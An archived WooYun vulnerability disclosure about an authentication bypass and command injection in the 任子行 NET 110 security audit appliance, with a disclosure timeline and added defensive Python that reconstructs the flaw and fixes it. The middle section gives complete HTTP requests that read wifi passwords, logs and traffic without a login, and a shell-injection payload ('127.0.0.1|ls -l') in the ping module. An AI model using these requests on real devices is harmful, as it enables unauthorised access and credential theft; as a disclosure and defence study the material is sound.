WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-03-21: Details reported to the vendor, awaiting vendor handling
2015-03-26: Vendor has confirmed; details disclosed to the vendor only
2015-03-29: Details opened to third-party security partners
2015-05-20: Details opened to core white hats and domain experts
2015-05-30: Details opened to regular white hats
2015-06-09: Details opened to intern white hats
2015-06-24: Details opened to the public
Arbitrary commands can be executed directly, the wifi password can be read directly, and internal network connection information can be read directly; in short, everything that would normally be visible after logging in can be obtained without logging in.

This looks like a backdoor in 任子行. Why? A normal system login checks a Cookie value, and that Cookie either changes randomly on every login or stays fixed together with the password. If the Cookie is wrong, the system prompts for login, returns an unauthorized message, or asks the user to log in again. The 任子行 NET 110 network security audit system behaves very strangely: if you delete the entire Cookie value and then make the request, the information is returned anyway. Bizarre!
Log information:
Getting the wifi password:
Arbitrary system command execution:
Getting user traffic statistics:
Get the system log

GET /cgi-bin/web_cgi?module=sys_log&op_req=read_system&start=0&limit=100 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Proxy-Connection: Keep-Alive

Get the wifi name and password

GET /cgi-bin/web_cgi?key_val=1&module=wl_safe&op_req=read_by_id HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Proxy-Connection: Keep-Alive
Content-Length: 2

Execute an arbitrary system command

POST /cgi-bin/web_cgi HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Content-Length: 74
Proxy-Connection: Keep-Alive
Pragma: no-cache

ip_addr=127.0.0.1|ls -l&module=net_tool&op_req=read_system&sub_module=ping

Get user browsing statistics

GET /cgi-bin/web_cgi?module=user_traffic_total&op_req=read_system&scope=0&t_scope=2 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://地址/
Accept: application/json, text/javascript, */*; q=0.01
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)
Host: 地址
Proxy-Connection: Keep-Alive
Content-Length: 2
In short, every function can be reached this way; I will not list them one by one.
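The two defects the report describes are a session check that only validates a Cookie when one is present, and a ping helper that passes ip_addr to a shell. The following is an added illustration, not code from the report or from the NET 110 product: a hypothetical reconstruction of the fail-open check next to a fail-closed one, plus strict validation of ip_addr so that a value like 127.0.0.1|ls -l never reaches a shell. The session table and cookie name are constructed assumptions.

```python
import ipaddress
from http.cookies import SimpleCookie

# Constructed session store standing in for whatever the appliance uses;
# the real NET 110 session handling is not known from the report.
VALID_SESSIONS = {"s3ss10n-t0k3n": "admin"}
SESSION_COOKIE = "session"  # assumed cookie name


def parse_cookie(header):
    """Return a cookie jar for a raw Cookie header, or None if the header is absent."""
    if header is None:
        return None
    jar = SimpleCookie()
    jar.load(header)
    return jar


def is_authenticated_fail_open(cookie_header):
    """Hypothetical reconstruction of the behaviour the report describes:
    a present cookie is validated, but a request with no Cookie header at
    all is treated as trusted, so stripping the cookie bypasses the login."""
    jar = parse_cookie(cookie_header)
    if jar is None:
        return True  # BUG: absent cookie waved through
    sess = jar.get(SESSION_COOKIE)
    return sess is not None and sess.value in VALID_SESSIONS


def is_authenticated_fail_closed(cookie_header):
    """Hardened check: a request is authenticated only when it presents a known session."""
    jar = parse_cookie(cookie_header)
    if jar is None:
        return False  # no cookie means no session, full stop
    sess = jar.get(SESSION_COOKIE)
    return sess is not None and sess.value in VALID_SESSIONS


def safe_ping_argv(ip_addr):
    """Build the ping command as an argv list (no shell) after strict validation.
    Anything that is not a bare IP address is rejected with ValueError."""
    host = ipaddress.ip_address(ip_addr)  # raises ValueError on '127.0.0.1|ls -l'
    return ["ping", "-c", "1", str(host)]


def ip_addr_is_acceptable(value):
    """True only when safe_ping_argv would accept the value."""
    try:
        safe_ping_argv(value)
        return True
    except ValueError:
        return False
```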
Cases:
Contact the vendor.
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-03-26 08:16
CNVD has confirmed the situation described; the vendor is actively claiming the issue. It has been forwarded to the vendor, which is actively handling it.
None